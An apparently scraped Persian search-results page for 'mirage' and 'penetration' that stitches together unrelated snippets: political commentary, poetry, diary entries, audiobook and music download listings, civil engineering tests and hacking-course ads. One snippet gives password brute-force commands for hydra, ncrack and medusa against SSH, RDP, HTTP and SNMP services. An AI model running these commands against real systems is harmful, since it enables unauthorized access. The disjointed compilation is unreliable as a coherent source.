نتایج جستجو برای عبارت :

جریان نفوذ با راهبردآب و سراب

بسمه تعالی

راهبردی به نام آب
و سراب

دشمنی استکبار و
ایادی او با ملّت ایران(حتی دیگر ملّتهای آزاده دنیا) نقطه فرجام و پایانی ندارد.
این بسیار ساده اندیشانه است که اگر کسی تصور کند روزی، نزاع فیمابین ما وآمریکا
به طور خاص و دنیای غرب به طور عامّ، در یک ظرف زمانی و مکانی، به ایستگاه پایانی
و آخر خود می رسد. چرا که نزاع بر سر موضوعاتی همچون حق هسته ای، سامانه دفاع
موشکی، حقوق بشر و...موضوعاتی فرعی و بلکه بهانه ای بیش نیستند. سخن و چالش اصلی، تقابل
کتاب صوتی رمان شب سراب

دانلود فایل

کتاب و فایل صوتی رمان شب سراب | god22 | 5064god22.ifilm20.ir › god22 › htmlکتاب و فایل صوتی رمان شب سراب ... نام رمان :رمان شب سراب به قلم : ناهید ا. ... به درخواست نویسنده / ناشر لینک های دانلود حذف گردید صفحه ی اول رمان: – سلام– به به ...
دانلود رایگان کتاب صوتی شب سراب اثر ناهید ا پژواک :: نسیم بوکnasimbook.blog.ir › post-10۲۹ خرداد ۱۳۹۸ - دانلود کتاب صوتی شب سراب اثر ناهید ا پژواک فرمت فایل ها: mp3 تعداد فایل ها: 50 حجم کل فایل ها
دانلود اهنگ عشق من ناز نکن از سراب لینک مستقیم همراه با متن. عشق من ناز نکن عمرما پایون میگیره. یه روزی دست زمونه تورو از من میگیره. وقتی تنها باتو بودن واسه من زندگیه.
دانلود آهنگ جدید سراب و سروش ملک پور عشق من ناز نکن با لینک مستقیم ... دانلود آهنگ جدید سراب و سروش ملک پور به نام عشق من ناز نکن + متن آهنگ. Download New Music of Sarab & Soroush Malekpour Called Eshghe Man Naz Nakon.
دانلود اهنگ عشق من ناز نکن از سراب (کیفیت 320) mp3 همراه با متن با ... دانلود اهنگ عشق من ناز نکن از سرا
خواهرم زنگ زد گفت فردا بریم سراب صحنه 
منم خواب بودم با صدای گوشی بیدار شدم 
گیج و منگ گفتم سراب صحنه همون سراب نیلوفره؟
خواهرم گفت نه همون جایی که تو و بنیامین رفتید 
گفت فردا وسیله میبریم میرسم اونجا پیک نیک 
گفتم من بخاطر اینکه این هفته سه بار رفتم کرمانشاه و برگشتم خیلی خسته
ممکنه نتونم بیام 
گوشی رو قط کردم .
دلم هری ریخت شروع کردم به اشک رو سایلنت 
من اونجا چطوری پا میزاشتم وقتی بنیامین اونجا خاطره داشتم.
دانلود اهنگ عشق من ناز نکن از سراب (کیفیت 320) mp3 همراه با متن با لینک مستقیم : همه حرفام بخدا از عشق و از سخاوته. عشق من بی کسی و شب باتو پایون میگیره. دانلود آهنگ جدید سراب و سروش ملک پور عشق من ناز نکن با لینک مستقیم. همه رگهام از ...
دانلود آهنگ جدید سراب و سروش ملک پور به نام عشق من ناز نکن + متن آهنگ. Download New Music of Sarab & Soroush Malekpour Called Eshghe Man Naz Nakon.
 دانلود آهنگ عشق من سراب quotجهت دانلود کامل آهنگ کلیک کنید httpwwwmelo96irpost224 quot quotجهت دانلود کامل ... دانلود آ
دانلود اهنگ عشق من ناز نکن از سراب (کیفیت 320) mp3 همراه با متن با لینک مستقیم : همه حرفام بخدا از عشق و از سخاوته. عشق من بی کسی و شب باتو پایون میگیره. دانلود آهنگ جدید سراب و سروش ملک پور عشق من ناز نکن با لینک مستقیم. همه رگهام از ...
دانلود آهنگ جدید سراب و سروش ملک پور به نام عشق من ناز نکن + متن آهنگ. Download New Music of Sarab & Soroush Malekpour Called Eshghe Man Naz Nakon.
 دانلود آهنگ عشق من سراب quotجهت دانلود کامل آهنگ کلیک کنید httpwwwmelo96irpost224 quot quotجهت دانلود کامل ... دانلود آ
فقط سه سالشه تکیه داده بود به دیوار وداشت به روبه روش نگاه میکرد، بهش میگم به چی نگاه میکنی!؟ میگه به ارزوهام بعدم میخنده و میره....
تا کلی وقت داشتم فک میکردم که چطور همچین جمله ای رو به زبون اورده!؟
بعدش به این فکر افتادم که ما از بچگی یاد میگیریم فقط به ارزوهامون نگاه کنیم  شایدم تو خانواده ما ارثیه!!! هرچقدرم که تلاش می‌کنیم همیشه ارزوهامون یه قدم جلوتراند انگار دیگه از خیر ارزوهام تو دنیا گذشتم که مدام خابشونا میبینم... استادمون میگفت چه اش
دانلود کتاب صوتی شب سراب اثر ناهید ا پژواک
فرمت فایل ها: mp3 تعداد فایل ها: 50 حجم کل فایل ها: 289 مگابایت مدت زمان پخش: 19 ساعت و 5 دقیقه نویسنده: ناهید ا پژواک ناشر: البرز نوبت چاپ: بیست و دوم تعداد صفحات: 576 سال انتشار: 1394 درباره کتاب: این کتاب با اقتباس از کتاب بامداد خمار توسط مولف به جهت اینکه احساس می نمود ...
دریافت فایل
دانلود کتاب صوتی شب سراب اثر ناهید ا پژواک - قطره https://www.ghatreh.com › news › دانلود-کتاب-صوتی
دانلود شیپ فایل مرز شهرستان سراب فرمت فایل دانلودی: .zipفرمت فایل اصلی: shpتعداد صفحات: 1حجم فایل: 14 کیلوبایت قیمت: 4300 تومانشیپ فایل مرز شهرستان سرابدر جدول توصیفی این شیپ فایل موارد زیر موجود است:- نام شهرستان- مرکز شهرستان- مساحت شهرستان به کیلومتر- محیط شهرستان به کیلومتر- مساحت شهرستان به هکتار
پرداخت با کلیه کارتهای عضو شتاب امکان پذیر است.
دانلود آهنگ مرتضی جوان شکسته ام شکسته
Download Music Morteza Javan Shekasteam Shekaste
دانلود آهنگ غمگین مرتضی جوان بنام شکسته ام شکسته
دانلود موزیک و ترانه مرتضی جوان شکسته ام شکسته
دانلود اهنگ شکسته ام شکسته مرتضی جوان
این شعر با اسم سراب هم شناخته میشود
برای دانلود آهنگ به ادامه مطلب مراجعه کنید …

تکست و متن آهنگ شکسته ام شکسته مرتضی جوان
شکسته ام شکسته شکسته دل شکسته
خسته شدم عزیزم کجایی شدم خسته
میگفتی که نمیشه تو را تنهات بزارم
چی شد عزیزم بی تو از ت
دانلود آهنگ مرتضی جوان شکسته ام شکسته
Download Music Morteza Javan Shekasteam Shekaste
دانلود آهنگ غمگین مرتضی جوان بنام شکسته ام شکسته
دانلود موزیک و ترانه مرتضی جوان شکسته ام شکسته
دانلود اهنگ شکسته ام شکسته مرتضی جوان
این شعر با اسم سراب هم شناخته میشود
برای دانلود آهنگ به ادامه مطلب مراجعه کنید …

تکست و متن آهنگ شکسته ام شکسته مرتضی جوان
شکسته ام شکسته شکسته دل شکسته
خسته شدم عزیزم کجایی شدم خسته
میگفتی که نمیشه تو را تنهات بزارم
چی شد عزیزم بی تو از ت
سگ سراب یک نژاد ایرانی به دلیل قدرت و فیزیک سالمی که دارد خیلی مشهور و محبوب می باشد.
مردم جهان این سگ را به نام ” ماستیف ایرانی ” ، ” شپرد ایرانی ” و ” سگ سرابی ” نیز می شناسند.
مردم ایران زمین مخصوصا قسمت های شمالی ، این نژاد را به عنوان یک سگ نگهبان در برابر خطرات احتمالی به کار می گرفتند. و در حال حاضر نیز تعداد زیادی از افراد ایرانی از سگهای سرابی به عنوان نگهبان خانه ، باغ ، ویلا ، کارگاه و گله هایشان استفاده می کنند.سگ سرابی جزو یکی

این بررسی ها حاکی از آن است که ضریب نفوذ اینترنت باندپهن ثابت از سال ۹۵ تاکنون رشد قابل توجهی نداشته است و ضریب نفوذ اینترنت موبایل که در سال ۹۵ حدود ۴۰ درصد بوده در منحنی رشد، سیر صعودی خود را طی می کند و در سال ۹۶ به نزدیک ۶۰ درصد رسیده، در سال ۹۷ ضریب نفوذ ۷۰ درصد را رد کرده و در سال ۹۸ به ضریب نفوذ ۸۰ درصد نزدیک می شود.

آخرین آمار و اطلاعات بخش فناوری اطلاعات کشور مربوط به پایان خردادماه امسال توسط سازمان تنظیم مقررات و ارتباطات رادیویی
عمری به سر دویدم در جست وجوی یارجز دسترس به وصل ویم آرزو نبوددادم در این هوس دل دیوانه را به باداین جست و جو نبودهر سو شتافتم پی آن یار ناشناسگاهی ز شوق خنده زدم گه گریستمبی آنکه خود بدانم ازین گونه بی قرارمشتاق کیستمرویی شکست چون گل رویا و دیده گفتاین است آن پری که ز من می نهفت روخوش یافتم که خوش تر ازین چهره ای نتافتدر خواب آرزوهر سو مرا کشید پی خویش دربدراین خوشپسند دیده ی زیباپرست منشد رهنمای این دل مشتاق بی قراربگرفت دست منو آن آرزوی گم ش
کتاب صوتی رمان شب سراب
نام رمان :رمان شب سراب به قلم : ناهید ا.پژواک حجم رمان : ۵.۶۲ مگابایت پی دی اف ,حجم فایل صوتی :350 مگابایت خلاصه ی از داستان رمان: این رمان در حال و هوای قدیم هستش و روایتگر قصه ی عاشق شدن دختری از خانواده ی اشراف زاده به پسری که شاگرد نجاره هست و بالاخره با hellip; به درخواست نویسنده ...
دریافت فایل
قابلیت نفوذ قیر

باسلام و خسته نباشید خدمت دوستان و همراهان عزیز نیل پالا
امروز میخواهیم درباره قابلیت نفوذپذیری قیر یا همان آزمایش درجه نفوذ قیر برای شما توضیح دهیم.با نیل پالا همرا باشید.

قابلیت نفوذ قیر یا همان آزمایش درجه نفوذ مرسوم‌ترین آزمایش برای اندازه‌گیری قوام قیر است.
قابل
چیزی در دلم می‌شکند. انگار که غرورم باشد. عقلم به دلم _شماتت بار _ میگوید دوباره به سراب دلبسته بوده‌ام.راستش من نمیدانم چه نصیب تو میشود که این چنین بنده‌ات را تشنه راهی سرابش میکنی و وقتی روشنایی اشک ِ شوق ِ رسیدن به چشمانش می‌افتد با روشنایی اشک ِ نرسیدن طاقش میزنی.عادت کرده‌ام به گریه کردن در دلم، بیصدا...ارام...با خودم و خودت در میان جمع.پایم به راه نمی‌اید. اما پیاده و تنها را هنوز خوش‌تر دارم. از دیگران خداحافظی میکنم و راهی خانه میشوم
دوره آموزش صفر تا صد تست نفوذ با پایتون در فروشگاه ما منشتر شد برای تهیه و مشاهده جزعیات بیشتر به این لینک مراجعه کنید
http://learnining.sazito.com/product/%D8%AF%D9%88%D8%B1%D9%87-%D8%A2%D9%85%D8%B2%D9%88%D8%B4-%D8%B5%D9%81%D8%B1-%D8%AA%D8%A7-%D8%B5%D8%AF-%D8%AA%D8%B3%D8%AA-%D9%86%D9%81%D9%88%D8%B0-%D8%A8%D8%A7-%D9%BE%D8%A7%DB%8C%D8%AA%D9%88%D9%86
همزمان با هفته کتاب و کتابخوانی انجام گرفت؛اجرای برنامه های متنوع فرهنگی توسط کتابخانه های عمومی سرابکتابخانه های عمومی سراب همزمان با هفته کتاب و کتابخوانی برنامه های متنوع فرهنگی اجرا کردند.
کتابخانه های عمومی شهرستان سراب به مناسبت درگذشت علامه طباطبایی و ایام گرامیداشت کتاب، کتابخوانی و کتابدار با اجرای برنامه های متنوع فرهنگی میزبان علاقمندان به کتاب و کتابخوانی شدند.
دیدار کتابداران کتابخانه های عمومی شهرستان سراب با ایرج ثقفی
دانلود کتاب صوتی شب سراب اثر ناهید پژواک MP3

دانلود فایل

دانلود کتاب سیر عشق آلن دوباتن | ایران پیپر - دانلود رایگان ...iran-paper.ir › دانلود-کتاب-سیر-عشق-آلن-دوباتندانلود کتاب سیر عشق آلن دوباتن. «نویسنده با مهارت دو سوی ازدواج را نشان می‌دهد و به کاوش تعامل ناسازگار عشق رمانتیک و عشق در عمل می‌پردازد. سیر عشق، کتابی نیمه ... رتبه: ۳٫۳ - ‏۴ رأی
امروز بخوانید؛دانلود رایگان رمان سیر عشقِ آلن دوباتن | دیجی ...www.digikala.com › خانه › کتاب و ادبیات۲۴
دستورات کاربردی در تست نفوذ جهت انجام حملات کرک آنلاین بر روی سرویس های مختلف:
SSHSNMPRDPHTTPبا ابزار هایی مانند :HydraMedusaNcrack===============تست نفوذ بر روی سرویس SSH ( شل امن  ) : 
hydra -l root -P passwd.txt 192.168.1.1 ssh
تست نفوذ بر روی سرویس RDP 
ncrack -vv  —user BlackDante -P /root/Desktop/passwd.txt rdp://192.168.1.1
تست نفوذ بر روی HTTP : 
medusa -h 192.168.1.1 -u admin -P passwd.txt -M http -m dir:/admin -T 50
تست نفوذ بر روی SNMP : 
hydra -VV  -P /root/Desktop/passwd.txt 192.168.1.1 snmp -T 1

فرمت فایل ها: mp3 تعداد فایل ها: 50 حجم کل فایل ها: 289 مگابایت مدت زمان پخش: 19 ساعت و 5 دقیقه نویسنده: ناهید ا پژواک ناشر: البرز نوبت چاپ: بیست و دوم تعداد صفحات: 576 سال انتشار: 1394 درباره کتاب: این کتاب با اقتباس از کتاب بامداد خمار توسط مولف به جهت اینکه احساس می نمود ...
دریافت فایل
محمد بود که گفتم باهم دعوا کرده بودیم و قهر بودیم 
که قرار بود من امروزشو برم اون جمعه صبحمو بیاد 
هیچی صبح رفتم می بینم اومده! میگه یادم رفت بهتون بگم ببخشید! 
چقدر حرص خورده باشم خوبه؟ 
جمعه صبح و شبم! 
خدایا شکرت 
رئیس جدید بابت شیفتها هیچ نگاهی نمی کنه 
خوب داره میخشو برای برنامه ی من محکم می کوبه 
دلم میخواد گریه کنم 
نشستم تو بخش 
پای اومدن به خونه رو نداشتم 
گفتم برم اون روانپزشکِ خانم که برا وسواسیم قرص داده بود 
نسشستم و نشستم و نشست
از بیدار شدن صبح، تا خوابیدن شب،
از ساحل دریای بی‌کران در طلوع، تا نوای پرستوهای غریب در آسمان غروب،
از دوری تمام‌نشدنی تو، تا چشمان منتظر فرزند پدری که غرق عرق شرم است،
از سراب رسیدن به تو، تا تنهایی رقت‌انگیز ستاره‌ای تنها در دل شب به انتظار خورشید،
از سرمای بی‌کران جان من، تا گرمای مطبوع آغوش دست‌نیافتنی تو،
از همه‌ی آن‌چه در تمامیت من است و به دنبال جلوه‌ای از تو می‌گردد...
به همت اداره کتابخانه های عمومی شهرستان سراب:مراسم گرامیداشت میلاد حضرت فاطمه زهرا (س) با حضور فرماندار سراب برگزار شدبه همت اداره کتابخانه های عمومی شهرستان سراب، مراسم گرامیداشت ولادت حضرت فاطمه زهرا(س) و امام خمینی(ره) با حضور ایرج ثقفی، فرماندار شهرستان سراب برگزار شد.
در این مراسم از برگزیدگان کتابخانه ای جشنواره رضوی و مسابقات کتابخوانی دهه فجر سال 1397 کتابخانه های عمومی سراب با اهدای لوح سپاس و بسته های فرهنگی تجلیل به عمل آمد.
ایرج
 سئو در مشهد
 به گزاره اینجانب اعتنا نمایید “امن ترین یعنی صرفا ترین ”   از حیث عموم  یعنی در صورتی روی یک سرور ۱۰۰۰ هزار تارنما باشد و یا این که ۱ وبسایت منحصربه‌فرد . البته این تمجید ابدا درست وجود ندارد زیرا تنهاترین جراحت پذیرترین هم می تونه باشه . رئیس یک سرور منحصربه‌فرد وقتی امن میباشد که بتوانید به طور کامل ماهر مدیریتش نمایید و سیستم های امنیتی در دست گرفتن داشته باشیدیک کدام از منش های نفوذ  و می شه اعلام‌کرد شل ترین شیوه نفوذ ب
سیستم X Interior با استفاده از فناوری پیشرفته نانو فناوری پیشرفته فوق العاده هیدروفی فای را برای محافظت از سطوح داخلی شما مانند صندلی های پارچه ای، فرش، چرم و وینیل با یک محصول پوشش حرفه ای ایجاد می کند. لکه ها و لکه ها به راحتی و به سرعت تمیز می شوند.
هنگامی که مایعات در تماس با System X Interior قرار می گیرند، درمان مواد را دفع می کند و مایعات را بدون نفوذ و رنگ آمیزی مواد رول می کنند. علاوه بر این، برای مواد با ساختار باز مانند فرش های پلاستیکی که مایعات
به فاصله پنج ساعت تار موی دیگه ام سفید شد
اتفاقی دیدمش وقتی جلوی آینه با آواز عاشق قمیشی موهایم راشانه میکردم
سفید شدنش را به چَشم دیدم  قَلبم گرفت خفگی کار دستم داد و اشک از گوشه چشمم چکید با ریختنش لبخند تلخ نبودنت روی لبهایم آمد 
یادم آند گفتی توجیهم کردی خطایی نداشته ای 
لمسش کردم وتکرار کردم تو یادگار تلخترین روز منی
.
اگر در جامعه ای تکاثر و متکاثران وجود داشته باشند، ممکن نیست در حکومت نفوذ نکنند و بر آن مستولی نشوند چه اینکه تکاثر (افزونخواهی و سرمایه داری ) بدون نفوذ در حکومت یا پدید نمیاید یا باقی نمیماند... به همین دلیل اسلام با این پدیده ویرانگر به مبارزه ای فراگیر پرداخته است مانند اینکه مال فراوان را حلال نمیشمرد و زندگی همراه با اتراف و اسراف را زندگی شیطانی می داند... و عالمان و دیگر مردمان را از معاشرت با ثروتمندان و همنشینی با ایشان بر حذر می دا
نگفتمت مرو آنجا که پادشات منم
در این سراب فنا چشمه حیات منم
و گر به خشم روی صد هزار سال ز من
به عاقبت به من آیی که منتهات منم
نگفتمت که به نقش جهان مشو راضی
که نقش بند سرا پرده رضات منم
نگفتمت که منم بحر و تو یکی ماهی
مرو به خشک که دریای با صفات منم
نگفتمت که چو مرغان به سوی دام مرو
بیا که قدرت پرواز و پرّ و پات منم
نگفتمت که تو را ره زنند و سرد کنند
که آتش و تبش و گرمی هوات منم
نگفتمت که صفت های زشت بر تو نهند
که گم کنی که سر چشمه صفات منم
نگفتمت که م

نکته اول: چرا این هواپیما به سمت سامانه پدافندی در حال حرکت بوده؟ و در این شرایط حساس مسیر دیگری را برایش تعیین نکرده اند؟
نکته دوم: چرا پدافند هوایی فوق العاده پیشرفته ایران که می تواند پیشرفته ترین پهباد جهان را، آن هم در حالت چراغ خاموش و مخفی، رهگیری و منهدم کند، نمی تواند یک هواپیمای مسافربری را از یک موشک کروز تشخیص دهد؟؟؟!!!
.
سه حالت بیشتر وجود ندارد:
حالت اول: به سیستم هواپیمایی کشور نفوذ شده.
حالت دوم: به سیستم پدافند هوایی کشور نفوذ
پرسشنامه نفوذ (اعمال قدرت)
دانلود پرسشنامه نفوذ (اعمال قدرت)ن، در قالب فایل Word، شامل 20 گویه، همراه با راهنمای نحوه نمره دهی و تفسیر، روایی و پایایی و منبع مورد استفاده. هدف این مقیاس تشخیص این است که افراد تحت تاثیر کدام یک از انواع قدرت رهبر قرار می گیرند. نحوه پاسخگویی این پرسشنامه بدین صورت است که ...
آزمایش نفوذ استاندارد 14 ص
نام فایل : آزمایش نفوذ استاندارد 14 ص فرمت : .doc تعداد صفحه/اسلاید : 14 حجم : 2 مگابایت آزمایش نفوذ استاندارد (spt ) با توجه به مشکلات تهیه نمونه های دست نخورده استفاده از ازمونهای صحرایی نفوذ بسرعت در حال گسترش می باشد متداولترین آزمایش های صحراییشامل آزمایش نفوذ استاندارد (spt ) ...
دریافت فایل
نام فایل : آزمایش نفوذ استاندارد 14 ص فرمت : .doc تعداد صفحه/اسلاید : 14 حجم : 2 مگابایت آزمایش نفوذ استاندارد (spt ) با توجه به مشکلات تهیه نمونه های دست نخورده استفاده از ازمونهای صحرایی نفوذ بسرعت در حال گسترش می باشد متداولترین آزمایش های صحراییشامل آزمایش نفوذ استاندارد (spt ) ...
دریافت فایل
دریافت فایل
دریافت فایل
رخنه یا هک به معنی سود بردن از یک روش سریع و هوشمندانه برای حل یک مشکل در رایانه می‌باشد. در علوم مربوط به رایانه معنی هک گاه مساوی معنی کرک (crack) که رمزگشایی است نیز عنوان می‌شود. در گفتگوهای امروزی هک به معنی نفوذ به یک سیستم رایانه‌ای است؛ و کرک نیز به معنی رمزگشایی است و کراکر (به انگلیسی: Cracker) به فرد گشاینده رمز می‌گویند.
در اصطلاح روزمره، رخنه کردن به معنی نفوذ به یک سیستم رایانه ای می‌باشد و رخنه گر  کسی است که با داشتن دانش کافی د
همچو شب باده تو از باده شب آمد ه ای،
ساغر لاله به کف بزم طرب آمده ای.
از کویری، که همه تشنه دیدار تو بود، 
ز سراب نظری دشت عرب آمدی،
 خنده شید شده دشمن هر شبنم گل،
جان به لب آمد و تو خنده به لب آمده ای.
کُشته ای غمزدگان را همه با غمزه و ناز،
از غزای غرض خود به غضب آمده ای.
روی خود تابی ز من، این دل من تاب نداشت،
تب طبخاله به لب حال عجب آمده ای.
همچو شب باده تو از بادیه شب آمده ای،
که برون از حد معیار ادب آمده ای.
نفوذ هوا به داخل یکی از عوامل موثر در افزایش بار حرارتی ( گرمایی و سرمایی ) ساختمان است . به طوریکه در زمستان نفوذ هوای گرم بیرون موجب افزایش بار سرمایی فضای مورد نظر می شود و در تابستان نیز نفوذ هوای سرد بیرون موجب افزایش بار گرمایی ساختمان می شود.محاسبه حجم هوای نفوذی یکی از عوامل مهم در محاسبه بار حرارتی ساختمان می باشد که به دو از شیوه های زیر تعیین می شود یک - روش حجمی V = (v * n) / 60 V V: حجم هوای نفوذی بر حسب CFM : حجم فضای مورد نظر ( فضایی که هوای
امروزه حتی دست فروش های خیابانی هم برای خودشان در شبکه های اجتماعی کمپین تبلیغاتی راه انداخته اند و خوب میدانند که بازاریابی اینترنتی چقدر تاثیرگذار است.
اینکه چقدر زود اینترنت توانست به همه جنبه های زندگی ما نفوذ کند، نشان از سرعت رشد فناوری است. روزگاری که رادیو پا به عرصه وجود گذاشت بسیار طول کشید تا به صورت عمومی استفاده شود و حتی می شود گفت که نتوانست همه دنیا را آنطور که باید فرا بگیرد. پس از آن نوبت به تلویزیون رسید اما اینبار سرعت نف
خداشناسی خود ب خود روی تمامی شخصیت ، 
روحیه ، اخلاق و اعمال شخص تاثیر می گذارد...
اندازه ی این تاثیر ب درجه ی باور و ایمان بستگی دارد.
هراندازه که ایمان انسان قوی تر و شدید تر ...
نفوذ خداشناسی در او بیشتر ...
و شخصیت آدمی ،
بیشتر تحت سیطره اش می شود.
* مراتب و درجات این تاثیر و نفوذ 
وابسته به کمال انسانی شخص و نزدیکی اش به خداست...
و همه ی این ها "صدق" و "اخلاص" نامیده می شود
یعنی همه ی این درجات 
درجات صدق و اخلاص است...
(کتاب جهان بینی_استاد شهید مطهری)

هکر: هکر کسی است که با سیستم‌های کامپیوتری آشناست و می‌تواند با روش‌های خاص(بدون اجازه) وارد آنها شود.
کرکر: کسی که هدفش از نفوذ به سیستم‌ها، خرابکاری و ایجاد اختلال در سیستم‌های کامپیوتری است.
واکر: کسی که هدفش از نفوذ به سیستم‌ها، استفاده از اطلاعات آن سیستم‌ها است.
انواع هکرها
کلاه سفید: این قشر اکثرا متخصصین شبکه و امنیت هستند و کار اصلی آنها نشان دادن نقاط ضعف و قوت یک سیستم است و به خاطر همین، این هکرها در شرکت‌های بزرگ کامپیوتری
با همکاری مرکز فناوری اطلاعات دانشکده مهندسی برق دانشگاه صنعتی شریف اولین کارگاه Metasploit پیشرفته در روزهای پنجشنبه و جمعه ۲۷ و ۲۸ تیرماه ۱۳۹۸، از ساعت ۹ الی ۱۷ برگزار شد.
این دوره با نام ارزیابی امنیت شبکه به کمک Metasploit و با هدف آشنایی شرکت کنندگان با تکنیک‌های مدرن پویش و نفوذ به شبکه و روش‌های مقابله با آنها برگزار شد.
متااسپلویت پرکاربرد‌ترین Framework متن باز (Open Source) تست نفوذ است که با استفاده از آن می‌توان آسیب‌پذیری های موجود در سیستم‌ها
ثروت گم گشته باز آید به دامان غم مخور
........................ سفره ی خالی شود روزی فسنجان غم مخور
ای تن خشکیده روزی پر شوی دل بد مکن
.............................. وین لب ترکیده باز آید به دندان غم مخور
گر سراب نان باشد باز بر چشم بدن
............................. نانوایی را خری یک روز ای جان غم مخور
دور فرمون گر دو روزی بر سرای ما نگشت
.......................... دایما فرمان نباشد پیچ پیچان غم مخور
در خیابان گر به شوق خانه خواهی زد قدم
............................... سرزنشها گر کند بنگاه منزل غم مخور
گرچه م
انفجار نفتکش‌ها  این بار در عمان!
و باز انگشت‌های خون‌آلود به سمت ایران می‌رود،
در شورای امنیت مطرح می‌شود،
امّا رسیدن به اجماع بین المللی علیه ایران، سراب می‌شود،
آیا در حال تکمیل پازلی برای بدست گرفتن تنگه و دریای عمان هستند؟
+سید علیرضا مصطفوی
سوز سرد دست می اندازد به استخوان هایم و خود را بالا می کشد، پیش می رود از بازوها به سمت گردنم. سلولهایم به نوبت جان می دهند، دست می گذارند بر شاهرگ زندگی، فشارش می دهند، خفه می شوند.
پلک ها کمی از هم فاصله می گیرند، از پشت یک لایه غبار، بین شاخ و برگهای سبز، به دنبال دارکوبها می گردم. از دوردست زوزه ی سگی بر دیواره های جمجمه پنجه می کشند و مگسی جان می دهد؛ آرام پشت سراب پنجره. عنکبوت در کمین است، انگشتانم به تارهای چسبناکش آغشته اند. چیزی سوت می
مسئولین اجرایی کشور چقدر باید سرمایه ملی را هدر دهند و اعتماد عمومی به نظام را به تاراج برند تا نهادهای نظارتی فوق، با آنها برخورد کنند!
از اینکه پدیده "نفوذ" در تار و پود مدیریت کشور رسوخ کرده است بحثی وجود ندارد ولی باید به این فکر کرد که "نفوذ" تا کجا و تا چه سطحی ریشه دوانده است؟!!
بعید به نظر می رسد ضربات مهلک این دفعه بر پیکر نظام کار "نفوذی ها" نباشد!

برو برو که خسته ام از شکستنم
من عاصی از هر عشق و هر دل بستنم
کبوترم که پر زدم ز بام تو
بیزارم از نامت به لب آوردنم
آ……..ه
یه روز سراب من و خواب من و شراب من تو بودی و تو
امروز شهاب من و تاب من و عذاب من تو هستی وتو
یه روز بهار من و یار من و قرار من تو بودی و تو
امروز خزان من و زوال من و زیان من تو هستی و تو
ستاره ها رو شمردم نیومدی و نمردم
بیا که جون نسپردم
بیا که جون نسپردم
میون گریه دویدم حباب اشکو دریدم
ندیدمت که ندیدم
ندیدمت که ندیدم
برو برو که خست
سلام بچه ها..
احتمالا دیگه نتونم بیام وب اینا..البته دقیق معلوم نیست..اگه همه چی خوب پیش بره میام
دعا کنین..
زلزله بدجور لرزوند..بین خودمون باشه از ترس...کککک
زلزله سراب هم بود که میدونید منم اونجا زندگی میکنم..
الان تونسم با شار گوشیم یه پست بذارم که اگر حتی یه درصد نگرانم شدید که میدونم نمیشید
از نگرانی درتون بیارم..همین
دعاکنین همه چی خوب پیش بره..تلفات کم باشه!!
اطراف محل زندگی پیشول هم زلزله بوده ولی چون باباش گوشیشو.گرفته هنوز خبری نتونسم بگ
به مناسبت ماه رمضان، که این غزل از لطیف‌ترین‌های مولاناست، که فکر کردن به مفهومش دل آدم رو می‌لرزونه، یه چیزی شبیه اینکه خدا بغلت می‌کنه و بغض صد هزار ساله‌ات می‌شکنه.

نگفتمت مرو آن جا که آشنات منم
در این سراب فنا چشمه حیات منم
وگر به خشم روی صد هزار سال ز من
به عاقبت به من آیی که منتهات منم
نگفتمت که به نقش جهان مشو راضی
که نقش بند سراپرده رضات منم
نگفتمت که منم بحر و تو یکی ماهی
مرو به خشک که دریای باصفات منم
نگفتمت که چو مرغان به سوی دام
توجه:این کتاب کاملا رایگان در سایت بدون رمز قرار داده میشود
موضوعات
1-کالی لینوکس چیست؟
2-.......
3-تست نفوذ+هک
این کتاب طوری نوشته شده که یک فرد کاملا مبتدی با مطالعه و تمرین و تکرار این کتاب میتوانید با کمی تلاش مفاهیم تست و نفوذ را یاد گرفته و از آن ها برای تقویت علوم خود در این زمینه استفاده نماید.

--خواهشمند است اگر اندوخته ای از این کتاب کسب کردید در راه غیر اخلاقی استفاده نکنید--
مسئولیت هرگونه سواستفاده بر عهده خود کاربر استفاده کننده میب
کتاب غزلحصارشاعر: میرفواد میرشاه ولد

هر چند که سیراب شدن از تو سراب استلب هام عطش دارد و لب های تو آب استدر ساغر من چشم تو را ریخته ساقیدر ساغر من سعی دو میخانه شراب استبر پهنه ی پیشانی تو جای دو ابروتگسترده پر و بال تو به غیظ عقاب استکوهم که شکسته ست به لبخند تو بغضمجاری شده بر گونه ی من سنگ مذاب استتنها ثمر روز و شب سر شده با عشقیک شاخه گل خشک شده لای اتاق استاین روح به تنگ آمده در کالبد مناین پیله که دور تو تنیدند حباب است
برای تهیه ی این کت
به کویر ماننده ایم
و به صحراهای داغناک
ما ،این آدمیان هبوط کرده در وادی حیرت
که چارسومان را دیوارهای سیمانی گرفته اند
تشنگانی که قدر دریا ندانسته
و پا از گلیم خویش فراتر گذاشتند
و سر از سراب در آوردند
ما این آدمیان سرگشته
این تشنگان تهیدست
...

و گفت :
یا موسی!
فقیر آنست که روزی دهنده ای چون منش نیست...
و بیمار آن که طبیبی چون من ندارد...
و غریب آن که رفیقی نیافته مانند من...
خدایا!
ما گدایان همواره در پیشگاهت سر میساییم
که از فقر عشق رنج می بریم
و ا
انگار شوق رسیدن به تو بیشتر غم ندیدنت توی روحم رسوخ کرده.
لبخندِ چسبیده به لبهای من!
بیخود خودت را غصه دار نکن...
من کنار توام...
تو مرا داری و غصه میخوری؟...
کاش دق کنم و همچون روزی را نبینم.
من با تو زنده ام
با تو زندگی میکنم
با تو نفس میکشم.
حتی اگر کنارم راه نروی...
حتی اگر چشمهات تا ارتفاع ستاره ها مرا پرواز ندهند...
حتی اگر توی چشمهام زل نزنی و نگویی که کنارم هستی...
حتی اگر دستهایت اینجا نباشند تا اشک مرا پاک کنند...
.
.
.
یک جمله هست که نمیدانم برایت
نقد رمان نفوذ در موساد

نقد رمان نفوذ در موساد : با خواندن این کتاب حس غرور و سربلندی می کنی.

نقد رمان نفوذ در موساد نوشته ی صالح مرسی
این کتاب و دو سه تا برادر
های این کتاب را که می­ خوانی پر از انرژی می­ شوی، احساس غرور و سربلندی
می­کنی حس زنده و پویا بودن در درونت می شکفد.

نویسنده ی این کتاب یک تابوشکن است.

بت بزرگ اما توخالیِ اسرائیل؛ چنان برای خودش هیبت ساخته که دولت­ها و
ملت­ها از ترسشان نمی ­توانند تکان و مخا

[+] آموزش های تصویری نفوذ و امنیت در سایت،سرور، ایمیل و وبلاگ ها

در این پکیج آموزشی انواع روشهای نفوذ به سایت ها سرورها ایمیل ها و ... توضیح داده شده است.

حجم تقریبی پکیج: 15 گیگابایت

تصویر زیر بخش کوچکی از محتویات پکیج را نشان می دهد.

به دلیل حذف این سایت توسط نهادهای نظارتی توضیحات در مورد پکیج در این صفحه قرار نداده ام.

